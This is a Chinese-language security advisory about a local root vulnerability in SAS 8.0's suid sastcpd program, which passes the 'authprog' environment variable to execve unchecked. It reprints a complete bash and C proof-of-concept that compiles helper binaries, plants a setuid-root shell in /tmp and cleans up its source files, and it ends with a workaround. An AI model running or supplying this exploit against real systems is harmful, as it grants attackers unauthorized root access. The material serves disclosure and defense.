SAS SASTCPD本地以管理员权限执行任意命令漏洞

受影响的系统:
SAS Software Integration Technologies 8.0
SAS Software Base 8.0

不受影响系统:

描述:
--------------------------------------------------------------------------------


BUGTRAQ ID: 3994

SAS Software提供了对数据分析、报告生成、企业级的信息传递的工具和解决方案，软件有Unix、Linux及Windows下的版本。sastcpd是SAS Software软件架构中的任务生成程序。

sastcpd实现上存在问题，本地攻击者可以利用sastcpd以root权限执行任意命令。

sastcpd程序对“authprog”环境变量未做任何检查就传递给execve系统调用执行，因为sastcpd程序是suid root安装的，这样就可能导致以root权限执行攻击者指定的任意命令。


<*来源：rpc （rpc@unholy.net）

链接：http://archives.neohapsis.com/archives/bugtraq/2002-01/0365.html
*>

测试程序：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！


rpc（rpc@unholy.net） 提供了如下测试程序：

#!/bin/bash
# sastcpd 8.0 'authprog' vulnerability.
# rpc ||
# Thanks sharefuzz!

cat </tmp/hesh.c
int
main(void)
{
setuid(0);
setgid(0);
execl("/bin/ksh", "ksh", (char *)0);
}
EOT

cat </tmp/heh.c
int
main(void)
{
setuid(0);
setgid(0);
system("chown 0:0 /tmp/hesh");
system("chmod 4755 /tmp/hesh");
return 0;
}
EOT

gcc -o /tmp/heh /tmp/heh.c
gcc -o /tmp/hesh /tmp/hesh.c

export authprog=/tmp/heh
/path/to/sas/utilities/bin/sastcpd

sleep 1
rm /tmp/he*.c
rm /tmp/heh
/tmp/hesh


--------------------------------------------------------------------------------
建议:

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 暂时去掉sastcpd程序的suid位，在运行前检查环境是否有恶意的内容。